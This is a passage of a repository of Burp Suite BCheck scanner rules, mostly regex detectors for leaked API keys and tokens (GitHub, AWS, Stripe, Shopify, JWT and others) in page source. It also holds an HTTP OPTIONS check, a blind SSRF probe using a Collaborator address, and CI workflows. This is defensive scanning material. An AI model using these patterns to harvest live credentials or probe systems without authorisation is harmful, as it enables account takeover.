v1-beta 3 | name: "Azure APIM Secret Key" 4 | description: "Looks for Azure APIM Secret Key in page source." 5 | author: "@puzzlepeaches" 6 | tags: "azure", "apim", "microsoft", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "Ocp-Apim-Subscription-Key:" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Azure - APIM Secret Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/fcm-server-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "FCM Server Key" 4 | description: "Looks for Firebase Cloud Messaging (FCM) server keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "google" 7 | 8 | given response then 9 | if {latest.response} matches "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "FCM server key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/google-client-id.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google Client ID" 4 | description: "Looks for Google client IDs in page source." 5 | author: "@puzzlepeaches" 6 | tags: "google", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google client ID found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/npm-access-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NPM Access Token (fine-grained)" 4 | description: "A detector for NPM access token exposure in page source." 5 | author: "@puzzlepeaches" 6 | tags: "npm", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "npm_[A-Za-z0-9]{36}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "NPM access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/razorpay-clientid-disclosure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Razorpay Client ID Disclosure" 4 | description: "Identifies exposure of Razorpay client ID." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "razorpay" 7 | 8 | given response then 9 | if {latest.response} matches "rzp_(live|test)_.{14}" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "Razorpay Client ID disclosed." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/shopify-app-secret.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shopify App Secret" 4 | description: "Looks for exposed Shopify app secret in page source." 5 | author: "@puzzlepeaches" 6 | tags: "shopify", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(shpss_[a-fA-F0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shopify App Secret found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/age-public-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Age Recipient (X25519 public key)" 4 | description: "Looks for Age Encryption public keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "age-encryption", "exposure", "tokens" 7 | 8 | given response then 9 | if {latest.response} matches "\bage1[0-9a-z]{58}\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Age Encryption Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/codeclimate-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CodeClimate Token" 4 | description: "Looks for instances of CodeClimate tokens in the page source." 5 | author: "@puzzlepeaches" 6 | tags: "codeclimate", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)codeclima.{0,50}\b([a-f0-9]{64})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "CodeClimate token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/discord-webhook.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Discord Webhook Disclosure" 4 | description: "Looks for Discord Webhook in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "discord" 7 | 8 | given response then 9 | if {latest.response} matches "https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Discord Webhook found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/github-oauth-access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitHub OAuth Access Token" 4 | description: "Looks for GitHub OAuth Access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "github", "oauth", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(gho_[a-zA-Z0-9]{36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitHub OAuth Access Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/oauth-access-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google OAuth Access Key Disclosure" 4 | description: "Looks for Google OAuth access keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "google" 7 | 8 | given response then 9 | if {latest.response} matches "ya29\.[0-9A-Za-z\-_]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google OAuth access key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/rubygems-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "RubyGems API Key" 4 | description: "Looks for RubyGems API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "rubygems", "token", "exposure", "ruby" 7 | 8 | given response then 9 | if {latest.response} matches "rubygems_[a-f0-9]{48}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "RubyGems API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/shopify-customapp-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shopify Access Token (Custom App)" 4 | description: "Looks for Shopify access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "shopify", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(shpca_[a-fA-F0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shopify access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/stackhawk-api.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "StackHawk API Key" 4 | description: "Looks for StackHawk API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "stackhawk", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(hawk\.[0-9A-Za-z_-]{20}\.[0-9A-Za-z_-]{20})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "StackHawk API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/github-personal-access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitHub Personal Access Token" 4 | description: "Looks for GitHub personal access token in page source." 5 | author: "@puzzlepeaches" 6 | tags: "github", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(ghp_[a-zA-Z0-9]{36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitHub Personal Access Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/google-oauth-prefixed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google OAuth Client Secret (prefixed)" 4 | description: "Looks for Google OAuth Client Secret in page source." 5 | author: "@puzzlepeaches" 6 | tags: "google", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(GOCSPX-[a-zA-Z0-9_-]{28})" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google OAuth Client Secret found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/technologies/Firebase-Detect.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Firebase Information Found" 4 | description: "Detect potentially exposed Firebase instances" 5 | tags: "passive, firebase" 6 | 7 | given response then 8 | if {latest.response.body} matches ".*\.firebaseapp\.com.*" then 9 | report issue: 10 | severity: low 11 | confidence: firm 12 | detail: "Potentially exposed Firebase instance detected in response." 13 | remediation: "Review the Firebase instance to ensure it does not allow unautohrized users to read/write to database." 14 | end if 15 | -------------------------------------------------------------------------------- /other/tokens/gitlab-personal-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitLab Personal Access Token" 4 | description: "Looks for GitLab Personal Access Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "gitlab", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitLab Personal Access Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/jdbc-connection-string.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "JDBC Connection String Disclosure" 4 | description: "Looks for JDBC connection strings in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "jdbc" 7 | 8 | given response then 9 | if {latest.response} matches "jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "JDBC Connection String found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/loqate-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Loqate API Key" 4 | description: "Looks for Loqate API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "loqate" 7 | 8 | given response then 9 | if {latest.response} matches "[A-Z]{2}[0-9]{2}-[A-Z]{2}[0-9]{2}-[A-Z]{2}[0-9]{2}-[A-Z]{2}[0-9]{2}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Loqate API key found in page source." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-rest-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NewRelic REST API Key Disclosure" 4 | description: "Searches for NewRelic REST API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "NewRelic" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)NRRA-[a-f0-9]{42}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Found NewRelic REST API key in page source." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/shopify-legacy-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shopify Access Token (Legacy Private App)" 4 | description: "Looks for Shopify access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "shopify", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(shppa_[a-fA-F0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shopify access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/stripe-restricted-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Stripe Restricted Key Disclosure" 4 | description: "Looks for Stripe restricted keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "stripe" 7 | 8 | given response then 9 | if {latest.response} matches "rk_(?:live|test)_[0-9a-zA-Z]{24}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Stripe restricted key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/twilio-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Twilio API Key" 4 | description: "Looks for Twilio API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "twilio", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)twilio.{0,20}\b(sk[a-f0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Twilio API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/recon/Check_OPTIONS.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "HTTP Methods Available (passive)" 4 | description: "Send HTTP OPTIONS method to site to check what methods are available via the response" 5 | author: "Ceramicskate0" 6 | 7 | given path then 8 | send request called check: 9 | method: "OPTIONS" 10 | 11 | if {check.response.headers} matches "[Aa]llow:[^\n]+" then 12 | report issue: 13 | severity: info 14 | confidence: tentative 15 | detail: `Check the 'Allow:' Header value(s)\n\n{check.response.headers}` 16 | remediation: "N/A" 17 | end if 18 | -------------------------------------------------------------------------------- /other/tokens/adobe-oauth-secret.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Adobe OAuth Client Secret" 4 | description: "Looks for Adobe OAuth Client secrets in page source." 5 | author: "@puzzlepeaches" 6 | tags: "adobe", "oauth", "exposure", "tokens" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Adobe OAuth Client Secret found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/jwt-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "JWT Token Disclosure" 4 | description: "Looks for exposure of various JWT tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token" 7 | 8 | given response then 9 | if {latest.response} matches "eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "JWT token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-insights-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "New Relic Insights Keys Disclosure" 4 | description: "Looks for New Relic Insights keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "newrelic", "keys" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "New Relic Insights key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/square-oauth-secret-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Square OAuth Secret Token Exposure" 4 | description: "Looks for Square OAuth Secret in page source." 5 | author: "@puzzlepeaches" 6 | tags: "token", "exposure", "oauth", "square" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)\b(sq0csp-[a-z0-9_-]{43})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Square OAuth Secret found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/zenserp-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Zenserp API Key" 4 | description: "Looks for Zenserp API keys in page source." 5 | author: "puzzlepeaches" 6 | tags: "exposure", "token", "zenserp", "apikey" 7 | 8 | given response then 9 | if {latest.response} matches "([0-9a-z-]{36})" and 10 | {latest.response} matches "zenserp" then 11 | report issue: 12 | severity: info 13 | confidence: tentative 14 | detail: "Zenserp API key found in page." 15 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 16 | end if 17 | -------------------------------------------------------------------------------- /.github/workflows/pr_bcheck_checker.yml: -------------------------------------------------------------------------------- 1 | name: Pull Request BCheckChecker 2 | 3 | on: 4 | pull_request: 5 | types: [opened, reopened, edited, synchronize] 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | 11 | steps: 12 | - uses: actions/checkout@v3 13 | - uses: actions/setup-java@v3 14 | with: 15 | java-version: '21' 16 | distribution: 'oracle' 17 | 18 | - name: Validate BChecks 19 | run: | 20 | [ $(sha256sum BCheckChecker-1.9.jar | awk '{ print $1 }') = 'a4e1ebffc0dabcea7e93778b86ab053b406a15782e4ffb0da48e3638a23f077d' ] 21 | java -jar BCheckChecker-1.9.jar 22 | -------------------------------------------------------------------------------- /other/tokens/shopify-public-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shopify Access Token (Public App)" 4 | description: "Checks for exposed Shopify access tokens in the body of public apps." 5 | author: "@puzzlepeaches" 6 | tags: "shopify", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(shpat_[a-fA-F0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shopify access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/shoppable-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shoppable Service Auth Token" 4 | description: "Looks for Shoppable Service Auth Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "shoppable", "token", "auth", "service" 7 | 8 | given response then 9 | if {latest.response} matches "data-shoppable-auth-token" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shoppable Service Auth Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/heroku-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Heroku API Key" 4 | description: "Looks for Heroku API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "heroku", "token", "exposure", "api" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Heroku API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/gitlab-pipeline-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitLab Pipeline Trigger Token" 4 | description: "Looks for GitLab Pipeline Trigger Token in page source." 5 | author: "@puzzlepeaches" 6 | tags: "gitlab", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(glptt-[0-9a-f]{40})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitLab Pipeline Trigger Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/google-calendar-link.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google Calendar URI Disclosure" 4 | description: "Looks for Google Calendar URIs in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "google" 7 | 8 | given response then 9 | if {latest.response} matches "https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google Calendar URI found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-synthetics-location-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Synthetics Location Key Disclosure" 4 | description: "Looks for Synthetics location key disclosures in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Synthetics location key disclosure found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/cloudinary-credentials.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Cloudinary Credentials Disclosure" 4 | description: "Looks for disclosed Cloudinary credentials in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "cloudinary" 7 | 8 | given response then 9 | if {latest.response} matches "cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Cloudinary credentials found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/jenkins-crumb-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Jenkins Token or Crumb in Source Code" 4 | description: "Looks for Jenkins token or crumb in page source." 5 | author: "@puzzlepeaches" 6 | tags: "jenkins", "crumb", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Jenkins token or crumb found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and\/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/zapier-webhook-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Zapier Webhook Disclosure" 4 | description: "Looks for disclosed Zapier Webhook tokens." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "zapier", "webhook" 7 | 8 | given response then 9 | if {latest.response} matches "https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Zapier Webhook token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /examples/blind-ssrf.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Request-level collaborator based" 4 | description: "Blind SSRF with out-of-band detection" 5 | author: "Carlos Montoya" 6 | 7 | given request then 8 | send request: 9 | headers: 10 | "Referer": {generate_collaborator_address()} 11 | 12 | if http interactions then 13 | report issue: 14 | severity: high 15 | confidence: firm 16 | detail: "This site fetches arbitrary URLs specified in the Referer header." 17 | remediation: "Ensure that the site does not directly request URLs from the Referer header." 18 | end if 19 | -------------------------------------------------------------------------------- /other/tokens/axiom-digitalocean-key-exposure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "DigitalOcean Key Exposure via Axiom" 4 | description: "Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments." 5 | author: "@puzzlepeaches" 6 | tags: "axiom", "digitalocean","key","exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\"do_key\"\: .*" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "DigitalOcean key exposed via Axiom." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/braintree-access-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "PayPal Braintree Access Token Disclosure" 4 | description: "Looks for PayPal Braintree access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "paypal" 7 | 8 | given response then 9 | if {latest.response} matches "access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Paypal Braintree access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-pixie-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "New Relic Pixie API Key" 4 | description: "Looks for New Relic Pixie API Key in page source." 5 | author: "@puzzlepeaches" 6 | tags: "newrelic", "pixie", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "New Relic Pixie API Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/newrelic-pixie-deploy-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "New Relic Pixie Deploy Key" 4 | description: "Looks for New Relic Pixie Deploy keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "newrelic", "pixie", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "New Relic Pixie Deploy key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/gitlab-runner-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitLab Runner Registration Token" 4 | description: "Searches for exposed GitLab Runner Registration Token in page source." 5 | author: "@puzzlepeaches" 6 | tags: "gitlab", "runner", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(GR1348941[0-9a-zA-Z_-]{20})(?:\b|$)" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Exposed GitLab Runner Registration Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/zoho-webhook-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Zoho Webhook Disclosure" 4 | description: "Looks for exposure of Zoho webhook tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "zoho" 7 | 8 | given response then 9 | if {latest.response} matches "https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Zoho webhook token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/aws-access-key-value.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS Access Key ID Value" 4 | description: "Detects AWS Access Key IDs exposed in the response body." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "aws", "amazon" 7 | 8 | given response then 9 | if {latest.response} matches "\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "AWS Access Key ID detected in the response body." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /.github/workflows/issue_webhook.yml: -------------------------------------------------------------------------------- 1 | name: Issues Webhook 2 | 3 | on: 4 | issues: 5 | types: [opened, reopened] 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | 11 | steps: 12 | - name: Push to webhook 13 | run: | 14 | echo $AUTHOR $TITLE $LINK 15 | curl "$WEBHOOK" -X POST -H 